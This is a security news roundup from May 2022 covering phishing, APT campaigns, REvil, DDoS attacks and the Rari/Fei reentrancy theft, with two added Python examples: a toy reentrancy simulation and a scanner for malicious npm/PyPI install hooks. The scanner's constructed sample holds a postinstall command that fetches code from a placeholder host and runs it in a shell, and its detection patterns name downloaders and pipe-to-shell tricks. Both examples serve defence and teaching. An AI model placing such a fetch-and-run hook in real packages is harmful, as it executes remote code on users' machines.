May 2, 2022

Fortify Security Team

Title: U.S. DoD Tricked into Paying $23.5 Million to Phishing Actor
Date Published: May 2, 2022

Excerpt: “The U.S. Department of Justice (DoJ) has announced the conviction of Sercan Oyuntur, 40, resident of California, for multiple counts relating to a phishing operation that caused $23.5 million in damages to the U.S. Department of Defense (DoD). The fraudster managed to divert to his personal bank account DoD funds destined for a jet fuel supplier.”

Title: Group-IB CEO Remains in Prison – the Russian-Led Company has Been ‘Blacklisted’ in Italy
Date Published: May 2, 2022

Excerpt: “The latest executive order from the Italian National Cybersecurity Agency (NCA) banned Group-IB, a Russian-led cybersecurity company, from working in the government sector, along with two other companies, Kaspersky Labs and Positive Technologies. Originally founded in Moscow, the company landed itself in controversy after one of its employees, Nikita Kislitsin, was indicted by the FBI for computer-related crimes – the selling of stolen customer data from major U.S.-based corporations. Kislitsin continues to work for Group-IB and is still currently listed on the Russian version of their official website. Later, Group-IB CEO Ilya Sachkov was arrested and detained by law enforcement and placed in prison – which has only led to more questions.”

Title: Deep Dive: Protecting Against Container Threats in the Cloud
Date Published: May 2, 2022

Excerpt: “Containers are self-contained pods representing complete, portable application environments. They contain everything an application needs to run, including binaries, libraries, configuration files and dependencies (Docker and Amazon Elastic, for instance, are two of the more well-known offerings). Multiple containers can run on a shared infrastructure and use the same operating system kernel, but they’re abstracted from that layer and have little contact with the underlying hosting resources (which could be, for example, a public cloud instance).”

Title: Ukraine and Romania Suffer Large-Scale DDoS Attacks
Date Published: April 30, 2022

Excerpt: “The Computer Emergency Response Team of Ukraine and the National Bank of Ukraine are warning of massive DDoS attacks against pro-Ukrainian targets. The intelligence service in Romania, SRI, also warns of a similar type of attack targeting sites belonging to its national authorities. According to the CERT-UA, the unknown threat actors are targeting compromised WordPress sites and injecting malicious JavaScript code called BrownFlood to perform the attacks.”

Title: Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia
Date Published: May 2, 2022

Excerpt: “A Russian state-sponsored threat actor has been observed targeting diplomatic and government entities as part of a series of phishing campaigns commencing on January 17, 2022. Threat intelligence and incident response firm Mandiant attributed the attacks to a hacking group tracked as APT29 (aka Cozy Bear), with some set of the activities associated with the crew assigned the moniker Nobelium (aka UNC2452/2652).”

Title: REvil ransomware returns: New Malware Sample Confirms Gang is Back
Date Published: May 1, 2022

Excerpt: “The notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks. In October, the REvil ransomware gang shut down after a law enforcement operation hijacked their Tor servers, followed by arrests of members by Russian law enforcement.”

Title: Hackers Stole +80M from DeFi Platforms Rari Capital and Fei Protocol
Date Published: May 1, 2022

Excerpt: “Threat actors stole more than $80 million from the decentralized finance (DeFi) platforms Rari Capital and Fei Protocol on Saturday. Researchers from smart contract analysis firm Block Sec reported that attackers exploited a reentrancy bug in Rari’s Fuse lending protocol. Rari Capital paused borrowing globally in response to the hack and ensured that all other funds are secure.”
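The reentrancy bug class named in this excerpt, shown as an added example in plain Python rather than Solidity. This is not Rari Capital or Fuse code: the vault, the attacker and the amounts are hypothetical, and the simulation only models the ordering defect that makes reentrancy possible (paying the recipient before debiting its balance) next to the checks-effects-interactions fix.

```python
"""Reentrancy in a toy lending vault, simulated in plain Python.

Added example, not Rari Capital / Fuse code: the vault, attacker and amounts
are hypothetical. A withdraw() that pays the recipient before recording the
withdrawal lets a malicious recipient re-enter withdraw() from its payment
callback while its balance still shows the old value.
"""


class VulnerableVault:
    """Interaction before effect: pays out, then debits the balance."""

    def __init__(self, reserve):
        self.reserve = reserve      # funds belonging to all depositors
        self.balances = {}

    def deposit(self, who, amount):
        self.balances[who] = self.balances.get(who, 0) + amount
        self.reserve += amount

    def withdraw(self, who, amount):
        if self.balances.get(who, 0) < amount:
            raise ValueError("insufficient balance")
        self.reserve -= amount
        who.receive(self, amount)        # external call: recipient runs code here
        self.balances[who] -= amount     # state updated only after the call


class SafeVault(VulnerableVault):
    """Checks-effects-interactions: debit first, then make the external call."""

    def withdraw(self, who, amount):
        if self.balances.get(who, 0) < amount:
            raise ValueError("insufficient balance")
        self.balances[who] -= amount     # effect recorded before the call
        self.reserve -= amount
        who.receive(self, amount)        # a re-entrant call now sees the new balance


class Attacker:
    """Recipient whose payment callback re-enters withdraw() a bounded number of times."""

    def __init__(self, amount, rounds):
        self.amount = amount
        self.rounds = rounds
        self.stolen = 0

    def receive(self, vault, amount):
        self.stolen += amount
        if self.rounds > 0 and vault.reserve >= self.amount:
            self.rounds -= 1
            try:
                vault.withdraw(self, self.amount)   # re-entry
            except ValueError:
                pass    # like try/catch on the inner call: the outer withdrawal still completes


def run_attack(vault_cls, rounds=5):
    """Returns (attacker's payout, vault reserve left, attacker's recorded balance)."""
    vault = vault_cls(reserve=100)        # 100 units from honest depositors (constructed)
    attacker = Attacker(amount=10, rounds=rounds)
    vault.deposit(attacker, 10)
    vault.withdraw(attacker, 10)
    return attacker.stolen, vault.reserve, vault.balances[attacker]


if __name__ == "__main__":
    print("vulnerable:", run_attack(VulnerableVault))   # (60, 50, -50)
    print("safe:      ", run_attack(SafeVault))         # (10, 100, 0)
```

Against the vulnerable vault the attacker deposits 10, withdraws 60 and ends with a recorded balance of -50, because every re-entrant call passes the balance check against the stale value. Against the fixed vault the second call fails the check, so the attacker receives only its own 10. The same ordering rule applies to the lending-pool case: update accounting before any call that hands control to another contract, or protect the function with a reentrancy guard.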

Title: New US Breach Reporting Rules for Banks Take Effect May 1
Date Published: April 29, 2022

Excerpt: “New cyber incident reporting rules are set to come into effect in the U.S. on May 1. Banks in the country will be required to notify regulators within the first 36 hours after an organization suffers a qualifying “computer-security incident.” The regulation was first passed in November 2021. The rule was passed by a collective of U.S. regulators, including the Federal Deposit Insurance Corp., the Board of Governors of the Federal Reserve System, and the Office of the Comptroller of the Currency.”

Title: Chinese “Override Panda” Hackers Resurface With New Espionage Attacks
Date Published: May 2, 2022

Excerpt: “A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information. “The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as ‘Viper’,” Cluster25 said in a report published last week.”

Title: Open Source ‘Package Analysis’ Tool Finds Malicious npm, PyPI Packages
Date Published: May 1, 2022

Excerpt: “The Open Source Security Foundation (OpenSSF), a Linux Foundation-backed initiative, has released its first prototype version of the ‘Package Analysis’ tool, which aims to catch and counter malicious attacks on open source registries. In a pilot run that lasted less than a month, the open source project, released on GitHub, was able to identify over 200 malicious npm and PyPI packages.”
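An added example of the cheap check a practitioner can run before the dynamic analysis the OpenSSF tool performs. This is not the Package Analysis tool's code (that project executes packages in a sandbox and records what they do); it is a static pre-filter for the two places malicious npm and PyPI packages most often put their payload, npm lifecycle scripts and setup.py install hooks. The indicator names, the two sample manifests and the package name "example-lib" are constructed for illustration.

```python
"""Static triage of install-time hooks in npm and PyPI packages.

Added example, not the OpenSSF Package Analysis tool: a simple static
pre-filter for npm lifecycle scripts and setup.py install hooks. Indicator
names and the sample manifests below are constructed for illustration.
"""
import json
import re

# npm scripts that run automatically on `npm install`
NPM_LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall",
                       "prepare", "preuninstall", "postuninstall"}

# Shell-level indicators for lifecycle script commands (hypothetical names)
SHELL_INDICATORS = {
    "downloader": r"\b(?:curl|wget)\b",
    "inline-node": r"\bnode\s+-e\b",
    "inline-shell": r"\b(?:ba)?sh\s+-c\b",
    "pipe-to-shell": r"\|\s*(?:ba)?sh\b",
    "encoding": r"\bbase64\b",
    "dynamic-exec": r"\beval\b|child_process",
}

# Source-level indicators for setup.py (hypothetical names)
PY_INDICATORS = {
    "install-hook": r"\bcmdclass\s*=|class\s+\w+\((?:install|develop|egg_info)\)",
    "process-exec": r"\bsubprocess\b|\bos\.(?:system|popen)\b",
    "encoding": r"\bbase64\b",
    "network": r"\b(?:urllib|requests|socket|http\.client)\b",
    "dynamic-exec": r"\b(?:exec|eval)\s*\(",
}


def _match(indicators, text):
    return [name for name, pattern in indicators.items() if re.search(pattern, text)]


def scan_npm_manifest(package_json_text):
    """Return one finding per lifecycle hook present, with the indicators it triggers."""
    manifest = json.loads(package_json_text)
    findings = []
    for hook, command in manifest.get("scripts", {}).items():
        if hook in NPM_LIFECYCLE_HOOKS:
            findings.append({"hook": hook, "command": command,
                             "indicators": _match(SHELL_INDICATORS, command)})
    return findings


def scan_setup_py(setup_py_text):
    """Return the indicators a setup.py triggers."""
    return _match(PY_INDICATORS, setup_py_text)


def needs_review(npm_findings, py_indicators):
    """Flag a package when a hook runs a suspicious command, or setup.py combines
    an install hook with at least one other indicator (a hook alone is common)."""
    npm_hit = any(f["indicators"] for f in npm_findings)
    py_hit = "install-hook" in py_indicators and len(py_indicators) > 1
    return npm_hit or py_hit


# Constructed samples (not real packages)
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-lib",
    "version": "1.0.3",
    "scripts": {
        "test": "jest",
        "postinstall": "node -e \"require('https').get('https://example.invalid/p', "
                       "r => r.pipe(require('child_process').exec('sh')))\"",
    },
})

SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import base64, subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.run(base64.b64decode("ZWNobyBoaQ==").decode(), shell=True)  # "echo hi"

setup(name="example-lib", version="1.0.3", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    npm = scan_npm_manifest(SAMPLE_PACKAGE_JSON)
    py = scan_setup_py(SAMPLE_SETUP_PY)
    print(npm)                   # postinstall -> ['inline-node', 'dynamic-exec']
    print(py)                    # ['install-hook', 'process-exec', 'encoding']
    print(needs_review(npm, py)) # True
```

A postinstall that only runs `node scripts/build.js` produces a finding with no indicators and is not flagged, so the filter is meant to prioritise packages for the sandboxed run, not to replace it: a payload fetched at runtime rather than at install time, or one that hides its strings, passes this check and is exactly what dynamic analysis exists to catch.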
